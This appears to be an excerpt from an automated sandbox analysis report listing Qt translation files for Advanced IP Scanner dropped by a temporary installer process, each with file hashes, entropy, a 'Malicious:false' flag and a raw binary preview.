                                                                                                                                                                                                  Preview:<.d....!..`...B..........\....;...^...;.......;..!....;.."....;..E....O..^....[..Z....^..1....^..VL..(5......G.......H,..SB..K...B...N:.. ...V...G..._...`.......*.......Sm...y..S........S.......Z......[....t..,O...t..TL...t..^y.....B....j.. ...5t......@...D...H5..\...f...1.......G....................~..4....`..9D...e..].......^.......... =...H..*.y...j.*.y.....*.%..&V.*.0..&..+.......+.....v.+......+......+....().G....!..G....,..H0...^I.Hw9...Y.Hw9.....I....*>.J6....$.J6......J6......J6...Ke.LD......L.b..^..M.S..CN.R.....|.V....1..Wi...]..W.T.....Z.|..U..[f3..X..gc......w0K..I...H...'5......_....T......."..6z...~..8... d..H9...T..0'..2....]......].......cm.9.E..Bj.L.#..f..M$o.....e.....|.l8...8[...^..K...I....h......D.......V.......\...>...u..>......3..1S..l...MH......;..5.l..b..AV...)..y....Z....0..V.......U.......\_..tb..7>...............=......W%......?|......Q..(....Vr.1V...+..R....3..W.<..b..f.~..#.......6...1....-...^..7....5...1..........c..H..;6...d..q.J..R...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_el_gr.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29651
                                                                                                                                                                                                  Entropy (8bit):5.330350785151233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ct97WPG5jbwTDnrXEPbfsDabKB2DsGM+04nMngRQpf5bLmdwmtPKP:8RWPU8nr0PY2hsGXnqxO3No
                                                                                                                                                                                                  MD5:E1A891010B901FE6055532E588E20293
                                                                                                                                                                                                  SHA1:167F62B548D6628FC1B989F6FD232BD362B59C23
                                                                                                                                                                                                  SHA-256:B20FC1BFC15F157CBDF4C04E8ABF7058FBE4549BFD92A7415A424D8BB5B8BF35
                                                                                                                                                                                                  SHA-512:AF0B8A085724DA971FF23228FAC2B04A5BF788FC3CFAD3481EF6E24A71E52348809A5E76BE287D68651F877F2A22391DE474140E8063DC1454678719B98E46F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........^....;.......;...e...;..!....;..#....;..H....O..a....[..]D...^..3....^..X...(5...A..G....F..H,..U...K...D...N:..!V..V...I..._...c,......,"......U....y..Ve......................^....t.......t..V....t..ag.....E....j..!...5t...K..@...G...H5.._q..f...3.......J................y...~..6....`..;....e..`.......`.......... =...K..*.y...,.*.y.....*.%..'..*.0..'..+.......+.......+......+....V.+....)..G...."..G.....m.H0...a).Hw9.....Hw9.....I....+..J6......J6....r.J6......J6...NQ.LD....J.L.b..a..M.S..F,.R.......V....3..Wi...`r.W.T...q.Z.|..W..[f3..[..gc......w0K..L...H...(.......b....T...q..."..8....~..;... d..J....T..1...2..........._.......f..9.E..E0.L.#..i..M$o.....e.......l8...:....^..N...I....f......G.......X......._...>......>...N..3..3#..l...P.......>..5.l..e..AV...+c.y....]....0..Yj......X[......_/..tb..9b.......c..............Y.......B.......TZ.(....Y..1V...,..R....5..W.<..f!.f.~..$t......8 ..1........^..9....5..........<...c..KF.;6...g..q.J..U@..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_en_us.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):319
                                                                                                                                                                                                  Entropy (8bit):4.379102897885305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:CwTA5/S39XWIlkHKVDQEoE6J2lRWRYrWlp/IM1gEE6J2lRWRYrWlp2lbIMWSEE/1:HA0tR5pQlXJ2lRWGcPXJ2lRWG8+
                                                                                                                                                                                                  MD5:FA3064E9270B3CE8D90EF2C4E00277C5
                                                                                                                                                                                                  SHA1:6E55C6F99FDA993DD301172900AD96DE2258C6FC
                                                                                                                                                                                                  SHA-256:BA4E20952EAE5DD959F1C0D3A4B9726A37BD81645D9DDE6B83C1E367032C77CD
                                                                                                                                                                                                  SHA-512:12A796A7FA23B325B172CF4A1491A146117A0C938D1C64369EB1B7DF7277676832B32D5221383E48E8E244225E370DC75B69F5C7638A4A7D4FF6121A26032AC1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B.............O.....P..q.....i........$.C.&.h.e.c.k. .f.o.r. .u.p.d.a.t.e.s..........Check for &updates.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.S.e.r.v.e.r..........Install Radmin Server.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.V.i.e.w.e.r..........Install Radmin Viewer.....VMain........

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_es_es.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28507
                                                                                                                                                                                                  Entropy (8bit):4.623752380391833
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+SMpoU+mEzzXQeqk2clHV//QY8BjefWOUxDid8KeDO33wE4:e6DmEzzX/qk2c9V//QZevUmk
                                                                                                                                                                                                  MD5:C576730007E97DD3B8F3C46FFF0F6DDD
                                                                                                                                                                                                  SHA1:311DF6FDB52905E3FFA80494FE0E1E7534060155
                                                                                                                                                                                                  SHA-256:F01DC02F68D88631535D8010960C2F306FCF07FC69F4A8113BF1A1D70130D001
                                                                                                                                                                                                  SHA-512:427751E2D8A84878837DEE345A22CC7AA3ADB0E8B40113C39E61038444121700142F56B73536FCF9AC5D150253277390AA9BEC08B29C408089C9C04E932BE89C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[,...;.......;.......;.......;..!....;..E....O..^....[..Y....^..1....^..U...(5......G.......H,..R~..K...A...N:......V...F..._..._P......).......R....y..S.......................[....t..+k...t..S....t..]......B....j......5t......@...D...H5..[...f...1I......G................!...~..4T...`..9"...e..])......]Q.......N. =...H..*.y.....*.y...Q.*.%..%..*.0..%..+.....Y.+.......+......+......+....'].G.... ..G....+..H0...]..Hw9.....Hw9.....I....)Z.J6......J6.... .J6......J6...K..LD......L.b..]..M.S..C..R.......V....1q.Wi...\..W.T.....Z.|..T[.[f3..X8.gc....^.w0K..J...H...&i......^....T...c..."..6Z...~..8... d..H3...T../Q..2...........\:......b..9.E..B,.L.#..e-.M$o.....e.......l8...8S...^..K...I...........D.......U9......[...>......>......3..0...l...M,......;..5.l..a..AV...)..y....Z3...0..V.......T.......[...tb..7$.......)..............V.......?.......Q..(....U..1V...*@.R....35.W.<..b..f.~..".......5...1....E...^..7....5...S..........c..H..;6...c..q.J..Q...I....O..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_et_ee.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27091
                                                                                                                                                                                                  Entropy (8bit):4.712868636230012
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WnNvji4/oUBfrXnBZRxyS/ROxXU9wpDPogAD0+q4:sjgUBfrXBZRxy4RZID2
                                                                                                                                                                                                  MD5:9D3E23BE36601D3604F9F370942DAA55
                                                                                                                                                                                                  SHA1:AE2ABAC157B6AB18E590F20B35568F03E5FA7A67
                                                                                                                                                                                                  SHA-256:0C5513FF8480C5A7372274E88581D13F89F4066DE5372C56C4220FCAB4C53D85
                                                                                                                                                                                                  SHA-512:3D93C6C33AB9EAA998BDFB1CB8384B7CA111EFF8D39DED2D9FD00CDB3588D6352C5A20CE08AA93704B4734AF61F8E8201FCFEA0D8EB984DAFF0FE888AE73B1E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........VR...;.......;.......;...O...;.......;..AZ...O..Y....[..T....^...A...^..P...(5......G....&..H,..M...K...=...N:......V...B..._...Z,......'.......M....y..Ne......................V$...t..);...t..N....t..X......>....j......5t......@...@...H5..V...f....e......C^.......{.......?...~..1....`..5....e..X#......XK.......`. =...D_.*.y...&.*.y...S.*.%..#..*.0..#..+.......+.......+......+......+....%..G...../.G....)..H0...X{.Hw9...w.Hw9...k.I....'l.J6......J6....0.J6......J6...F..LD......L.b..X..M.S..?..R.....R.V.......Wi...W..W.T...'.Z.|..O..[f3..Sd.gc....^.w0K..Ex..H...$.......Y....T......."..2....~..5... d..C....T..,...2...........WN......]9.9.E..>F.L.#.._..M$o.....e.......l8...4....^..G...I....@......@.......P}......W...>......>...x..3..-...l...H.......8..5.l..\W.AV...'-.y....UW...0..QJ......PE......V...tb..3........Y..............Q.......;f......L..(....P..1V...(<.R....0..W.<..\..f.~.. .......2...1........^..4....5..............c..D..;6...^E.q.J..ML..I....o..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fa_ir.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26044
                                                                                                                                                                                                  Entropy (8bit):5.23160860836295
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:USrTnWGBewzY6ek4qnVBarz5QVZSp8R0SRWEN8ejwVRH9Pkq0+u3lZR:U6bWGBe96YqVBarz5QVZ1pRDOeIJtKT
                                                                                                                                                                                                  MD5:D7B6ACB98C438672B2D6E2DA7720191D
                                                                                                                                                                                                  SHA1:3F2CCE40CA80158F1A24258309E78978A8915C85
                                                                                                                                                                                                  SHA-256:DDB5D2E12292BF444B24067E959DE8EB60F7158C1FD7717433739B3E3752B539
                                                                                                                                                                                                  SHA-512:ECCE6C5D0BE732DB27EAF8AD76D425AEC6A852DC41F9501CCAF2E755B7EE42735291FB199139A196DBC017A33B2CC54018CDE8E044E1E7C972C23506C75ACB6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........R....;...L...;.......;.......;...m...;..>....O..U....[..Q0...^..+....^..Mx..(5...{..G.......H,..J...K...:...N:...b..V...?{.._...V4......%.......J....y..KI......................RV...t..'7...t..K....t..T......;....j......5t......@...=Q..H5..S...f...,.......@,.......G...........~.......`..2....e..TM......Ts.......h. =...A#.*.y.....*.y...Y.*.%..!..*.0..!..+.......+.......+....V.+......+....#..G.......G....'..H0...T..Hw9...Y.Hw9.....I....%t.J6......J6......J6....p.J6...C..LD....t.L.b..T..M.S..<..R.......V....,M.Wi...S..W.T...5.Z.|..Ls.[f3..O..gc......w0K..B*..H...".......U....T...I..."..0....~..2~.. d..@....T..*...2...........St......Y-.9.E..;:.L.#..[..M$o.....e.......l8...2....^..C...I....2......=~......M3......S3..>......>...L..3..+...l...E.......5Z.5.l..XK.AV...%5.y....Q....0..M.......L.......R...tb..1.......................N1......8h......I..(....M..1V...&B.R....-..W.<..X..f.~...D......04..1........^..1....5...y..........c..@..;6...Z=.q.J..JF..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fi_fi.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27753
                                                                                                                                                                                                  Entropy (8bit):4.678188889713697
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G9OyAk9n+iiUO3ipj1BlQdiJCEG7o5CjUiiPtVPpCAIA+rp9kBMHoyAC:G9OKn+i+3QjedMCUUUZVPp6z
                                                                                                                                                                                                  MD5:0D6C50CD51EDD656D636117A22517308
                                                                                                                                                                                                  SHA1:B9753A4E1D581A19D39B71187CBECCEAC0BA5066
                                                                                                                                                                                                  SHA-256:D8680E21C7F89BB60C631AF894F5DEAB5B95CF87A6624F04B087C4A1BDBEACAD
                                                                                                                                                                                                  SHA-512:91158D0D0B3DE7C34231F20542E2F2E8F98E76128C4E5B86F358E804CA6D30AD9E6162DE39FF018802CFDFA1BD6E3B3A85AB7A78AD77CC334D6478F8E815D02C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........X....;.......;.../...;.......;.. ....;..B....O..[f...[..W(...^../?...^..S...(5...W..G.......H,..P...K...?4..N:......V...D/.._...\.......(|......P5...y..P........=..............XZ...t..*....t..Q....t..[......@4...j......5t...k..@...A...H5..Y'..f.../g......D....................~..2X...`..6....e..Zw......Z.......... =...E..*.y...n.*.y.....*.%..$`.*.0..$..+.......+.....,.+......+....n.+....&3.G.......G....*m.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....h.J6...H..LD......L.b..[<.M.S..@..R.......V..../..Wi...Z .W.T...[.Z.|..Q..[f3..U..gc......w0K..G"..H...%9......\....T......."..40...~..6R.. d..Ec...T..-...2....-......Y......._..9.E..?..L.#..b?.M$o.....e.....H.l8...6....^..H...I....Z......B$......R.......YO..>...7..>......3......l...Jj......94.5.l..^..AV...'..y....W....0..S.......R.......X...tb..5.......................S.......<.......N..(....S6.1V...)..R....1I.W.<.._5.f.~..!.......3...1........^..5a...5...u......2...c..E..;6...`..q.J..O|..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fr_fr.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28669
                                                                                                                                                                                                  Entropy (8bit):4.635479137963866
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
                                                                                                                                                                                                  MD5:A5D24342E9B32AD9714C091BB135D180
                                                                                                                                                                                                  SHA1:7B193290CFE8190B60122C2219972512695E5D68
                                                                                                                                                                                                  SHA-256:2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
                                                                                                                                                                                                  SHA-512:140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......*L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK.*.y.....*.y.....*.%..&..*.0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V...*..R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_he_il.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24993
                                                                                                                                                                                                  Entropy (8bit):5.35342565714326
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6vsXcNgywHOUW6MAlHWknGhq984qSDPGZbGCeozTGAGaj:8gywHOUXMAlHWknOqi+G5GC9
                                                                                                                                                                                                  MD5:3928085E21EA3A08476A8FF476B3DF1E
                                                                                                                                                                                                  SHA1:811D18C1C6F92CB49902E060E5C47700D5AF87B1
                                                                                                                                                                                                  SHA-256:A5D01162A23EE399F78DCFE1717BAA140BAB5CC4F099699DE000FCA923097790
                                                                                                                                                                                                  SHA-512:0ED2A612815E1632D037F0651B70AB8797EA5B9CF06B040EFE1DE5805F0F6E50A3BFA84F2A28A7A45156C2141BA5A5FE1CAC99260BBAAC1A0B25DE1929747F40
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........N0...;.......;...w...;.......;.......;..; ...O..P....[..L....^..*C...^..IB..(5......G.......H,..F...K...7...N:......V...<o.._...Q.......$J......F....y..G/.......?..............N....t..%....t..G....t..Pm.....8....j......5t...+..@...:E..H5..N...f...*g......=........).......Q...~..,....`..0n...e..O.......P.......... =...>..*.y.....*.y.....*.%.. ..*.0.. ..+.......+.....6.+......+....l.+...."G.G.......G....&..H0...PI.Hw9.....Hw9.....I....#..J6......J6....<.J6......J6...@s.LD....T.L.b..P..M.S..8..R.....<.V....*..Wi...O..W.T.....Z.|..HA.[f3..K..gc....^.w0K..?$..H...!i......Q^...T......."...`...~..0... d..=....T..(...2...........O"......T..9.E..8..L.#..Ws.M$o...8.e.....f.l8.../....^..@...I....*......:p......H.......N...>......>......3..)...l...A.......2..5.l..S..AV...#..y....M_...0..I.......H.......N...tb..........................J.......5.......Ez.(....Il.1V...$..R....+..W.<..Tg.f.~...H..........1........^../E...5..............c..=..;6...U..q.J..F6..I....y..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_hr_hr.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27888
                                                                                                                                                                                                  Entropy (8bit):4.695402138614251
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ZP5z0nT4x6kjXVkllEmXd6+TfM1nO6Pgv+n4kOby4WvJ:UT4MkbV2EUd6+cnO6YGn4M
                                                                                                                                                                                                  MD5:B1DC69B7C86A8BEBB7B758BB8B241535
                                                                                                                                                                                                  SHA1:B75C4FC69FAC889067A836AB620285984476B7D9
                                                                                                                                                                                                  SHA-256:ADC549E5F4771AE234DB87847B9797C0217581B69C5A06A254877F19D225058F
                                                                                                                                                                                                  SHA-512:62B262F6E79BC8D3A40506FB3CE6DE6528FCFD9C8D62C033584CEF56A0F70ECEAEA4E9B82951639593303AADC88E7758E069B8DE419C2539FC1E75A52F9BE1FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........X....;.......;.......;.......;..!a...;..Cl...O..[....[..W....^../....^..SX..(5......G....v..H,..PT..K...?...N:...B..V...D..._...\.......).......P}...y..P.......................X....t..*....t..Q\...t..[i.....@....j...q..5t......@...B...H5..Y...f...0.......Eh...................~..2....`..7B...e..Z.......[........R. =...Fw.*.y.....*.y.....*.%..$..*.0..%'.+.....a.+.......+......+....4.+....&..G.... ..G....+..H0...[;.Hw9.....Hw9.....I....(..J6....f.J6......J6......J6...I..LD......L.b..[..M.S..A0.R.......V....0;.Wi...Z..W.T.....Z.|..R-.[f3..U..gc....0.w0K..G...H...%.......\x...T...M..."..4....~..6... d..E....T...Q..2....k......Y.......`..9.E..@>.L.#..b..M$o...@.e.......l8...6m...^..IR..I....z......B.......S.......Y...>...{..>......3../...l...J.......9..5.l.._..AV...(_.y....X....0..S.......R.......YS..tb..5r.......+..............T?......=r......O..(....S..1V...)..R....1..W.<.._..f.~.."H......4^..1....+...^..5....5...#..........c..F0.;6...aE.q.J..O...I..../..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_hu_hu.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28416
                                                                                                                                                                                                  Entropy (8bit):4.745555315840919
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:G1rjeSTVZbKagGwTFToL3RvDWI7zfoiOp3cHWyQ68rZPFaEvRVaib:OHfKagGwTFTWdDWI7boiOp3cHW3P1RVB
                                                                                                                                                                                                  MD5:A8F9FC9108D8E44F2111BC7AC63C9F75
                                                                                                                                                                                                  SHA1:1692FD262A44FD674D4E48644CE22C175AF0C865
                                                                                                                                                                                                  SHA-256:A10D0CF6FC8DD20290BD11529DC1DB210D69B05FE518F2248D6D720AF8495470
                                                                                                                                                                                                  SHA-512:99C008F4CE997384D024390A896275BCD10B53D8725F1E9CB2628AB119B1381DABC5189C60C85A817C52AF33AC3D0E2D190373C9F7F8707A6FDD508E61C4C2B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Z....;.......;.......;.......;..!....;..D....O..]....[..Y^...^..0....^..U...(5......G.......H,..R...K...A...N:...r..V...F..._...^.......)d......R;...y..R.......................Z....t..+%...t..S*...t..]=.....A....j......5t......@...C...H5..[O..f...0.......F....................~..3....`..8|...e..\.......\........(. =...G..*.y.....*.y.....*.%..%..*.0..%;.+...../.+.......+....^.+......+....&..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)..J6....n.J6......J6....*.J6...Js.LD......L.b..]r.M.S..B`.R.......V....0..Wi...\J.W.T.....Z.|..S..[f3..W..gc....@.w0K..I ..H...%.......^T...T...%..."..5....~..8... d..GQ...T../...2....7......[.......b..9.E..At.L.#..d..M$o...h.e.......l8...7....^..J...I....H......C.......T.......[u..>...S..>......3..09..l...LZ......;,.5.l..a..AV...(..y....Y....0..U.......T.......[...tb..6f......................V.......>.......P..(....UP.1V...)..R....2..W.<..a..f.~.."N......5*..1...._...^..6....5...A..........c..G..;6...cU.q.J..Q...I....;..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_id_id.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27444
                                                                                                                                                                                                  Entropy (8bit):4.672755214321859
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:l3POS+SsVKz36+e26v7powzg+fhSsbiGr:hORlVKz3Ze2y7pV00
                                                                                                                                                                                                  MD5:5323FC9E0D0110FE16F649B91167E604
                                                                                                                                                                                                  SHA1:88DBC51B2F91B23DC75A2EB1A64EC8FFE05C7FDB
                                                                                                                                                                                                  SHA-256:660389BE673840C90CC9F93C9BE9A16E721F9A60C2934A9468C7307044C890E1
                                                                                                                                                                                                  SHA-512:526655F5663509FBB545E67F643CEEB2D5FE558FBF02466AC58733ADEE8BDF8996B3FCB9CCBB860E49FADEF3B4E27D4C127FD4F3AD6FDCB8EEE27DC993CA21BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........W(...;...N...;.......;.......;.. ....;..B6...O..Y....[..U....^.......^..Q...(5...w..G.......H,..N...K...>...N:......V...C..._...[2......(T......N....y..Oa.......}.......V......V....t..)....t..O....t..Y......?....j......5t......@...AG..H5..W...f.../.......D:...................~..1....`..6....e..Y.......Y5......... =...EO.*.y.....*.y.....*.%..$>.*.0..$g.+.......+.......+....H.+......+....&..G.......G....*G.H0...Ye.Hw9...7.Hw9...'.I....'..J6......J6......J6....h.J6...G..LD......L.b..Y..M.S..?..R.......V..../=.Wi...X..W.T.....Z.|..P..[f3..T..gc......w0K..Fv..H...%.......Z....T......."..3....~..5... d..D....T..-{..2....=......X.......^c.9.E..>..L.#..a..M$o.....e.......l8...5K...^..H...I....j......Az......QW......W...>...]..>......3......l...I~......8..5.l..]i.AV...'..y....V/...0..R&......Q.......W...tb..42...............K......R.......<.......M~.(....Q..1V...(..R....0..W.<..]..f.~..!.......3 ..1........^..4....5...w......t...c..E..;6..._{.q.J..NL..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_it_it.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28141
                                                                                                                                                                                                  Entropy (8bit):4.629516521520014
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XAbel+QUett3u72zMsS3z9K1A/TW/2bgH85qwDLEOghX5iNK+H:qQUetjTS3z9GAq/QcSqsLEM
                                                                                                                                                                                                  MD5:08AB1F12E7ED69CA493109B02A920C27
                                                                                                                                                                                                  SHA1:CD6433F48E1FA82747C57AE254E046BDEDC8A429
                                                                                                                                                                                                  SHA-256:943EB81FB1A7D11FC3CAA8D7E5E9DEC1C4940983D516F2B9612B68AF07E4CA44
                                                                                                                                                                                                  SHA-512:C00A5FF0C467F7A52AA837BD09234A4E4A959F6CE4D5EED773AC2FB7BAC9914A9748A54A41CA2269C240B5AF0644FB7B7A29286DA43D21B209E85D0E3713EEA0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Y....;.......;.......;.......;..!....;..D....O..\....[..XZ...^..0e...^..T...(5......G....R..H,..Q...K...@...N:...Z..V...E..._...].......)\......Q=...y..Q................`......Y....t..+....t..R....t..\G.....A....j......5t......@...C...H5..Zu..f...0.......F....................~..3>...`..8....e..[.......[.......... =...G..*.y.....*.y.../.*.%..%N.*.0..%w.+.....5.+.......+....f.+......+....'..G.... ..G....+e.H0...\..Hw9...Q.Hw9.....I....(..J6....Z.J6......J6......J6...J7.LD......L.b..\v.M.S..B,.R.....Z.V....0..Wi...[p.W.T.....Z.|..R..[f3..V..gc....".w0K..H...H...&!......]^...T...;..."..5L...~..7... d..G....T......2....W......Z.......a1.9.E..A<.L.#..c..M$o.....e.......l8...77...^..Jn..I....h......C.......S.......Z...>...w..>......3../...l...K.......:..5.l..`C.AV...(..y....X....0..T.......S.......Z9..tb..6 ...............a......U.......>.......O..(....TB.1V...)..R....2/.W.<..`..f.~.."p......4...1........^..6....5..............c..G\.;6...bW.q.J..P...I....#..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ja_jp.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23348
                                                                                                                                                                                                  Entropy (8bit):5.657948878761793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
                                                                                                                                                                                                  MD5:EFD6D076AAD193007E77BFA1BB46E3DA
                                                                                                                                                                                                  SHA1:92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
                                                                                                                                                                                                  SHA-256:2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
                                                                                                                                                                                                  SHA-512:11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
                                                                                                                                                                                                  Malicious:false
